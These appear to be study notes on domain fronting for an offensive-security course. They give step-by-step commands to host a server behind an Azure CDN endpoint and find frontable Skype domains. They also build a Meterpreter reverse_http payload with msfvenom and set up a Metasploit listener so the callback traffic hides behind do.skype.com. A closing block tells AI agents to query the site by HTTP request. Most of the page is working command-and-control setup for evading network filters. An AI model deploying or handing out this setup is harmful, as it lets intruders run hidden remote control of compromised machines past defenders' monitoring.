# Domain Fronting

1. setup custom CDN endpoint & custom origin hostname that listener host hosting the web ser

<figure><img src="/files/MIWJC4ScVg3a89M6bwOc" alt=""><figcaption></figcaption></figure>

{% code title="cust. origin hostname ser" %}

```
sudo python3 -m http.server 80
```

{% endcode %}

{% code title="ser to handle https" %}

```
from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import socketserver

httpd = socketserver.TCPServer(('138.68.99.177', 443), SimpleHTTPRequestHandler)

httpd.socket = ssl.wrap_socket(httpd.socket, 
        keyfile="key.pem", 
        certfile='cert.pem', server_side=True)

httpd.serve_forever()
```

{% endcode %}

```
sudo python3 httpsserver.py
```

{% code title="verify connectivity" %}

```
curl http://offensive-security.azureedge.net
curl -k https://offensive-security.azureedge.net
```

{% endcode %}

{% hint style="info" %}
the CDN fetch the custom origin hostname web ser
{% endhint %}

<figure><img src="/files/UKZlbyIUqrZyazc3XTfY" alt=""><figcaption></figcaption></figure>

{% code title="2." overflow="wrap" %}

```
git clone https://github.com/rvrsh3ll/FindFrontableDomains
cd FindFrontableDomains/
sudo ./setup.sh
python3 FindFrontableDomains.py --domain skype.com
```

{% endcode %}

3. check if it is fetching custom server content from the host that host the custom origin hostname web set in 1.  (same as 1. end results)

<pre><code>curl --header "Host: <a data-footnote-ref href="#user-content-fn-1">offensive-security.azureedge.net</a>" <a data-footnote-ref href="#user-content-fn-2">http://do.skype.com</a>
</code></pre>

<figure><img src="/files/wse5ukbgtNyFCQvHXbvf" alt=""><figcaption><p>no return = failed</p></figcaption></figure>

{% code title="4. create payload" overflow="wrap" %}

```bash
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=do.skype.com LPORT=80 HttpHostHeader=offensive-security.azureedge.net -f exe > http-df.exe
```

{% endcode %}

5. configure listener on VM that hosting the 1. custom origin hostname web

<pre class="language-bash"><code class="lang-bash">set LHOST do.skype.com
set <a data-footnote-ref href="#user-content-fn-3">OverrideLHOST </a>do.skype.com
set OverrideRequestHost true
set HttpHostHeader offensive-security.azureedge.net
run -j
</code></pre>

<figure><img src="/files/gfW4CShlI70XwKHJlBbE" alt=""><figcaption><p>when it is actually connecting to the custom origin hostname server directed by the CDN</p></figcaption></figure>

[^1]: CDN setup in 1.

[^2]: resulted from 2.

[^3]: can change the listening port as well with the *OverrideLPORT* option


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://osnotes.jackielam.net/osep/network/bypass-network-filters/domain-fronting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.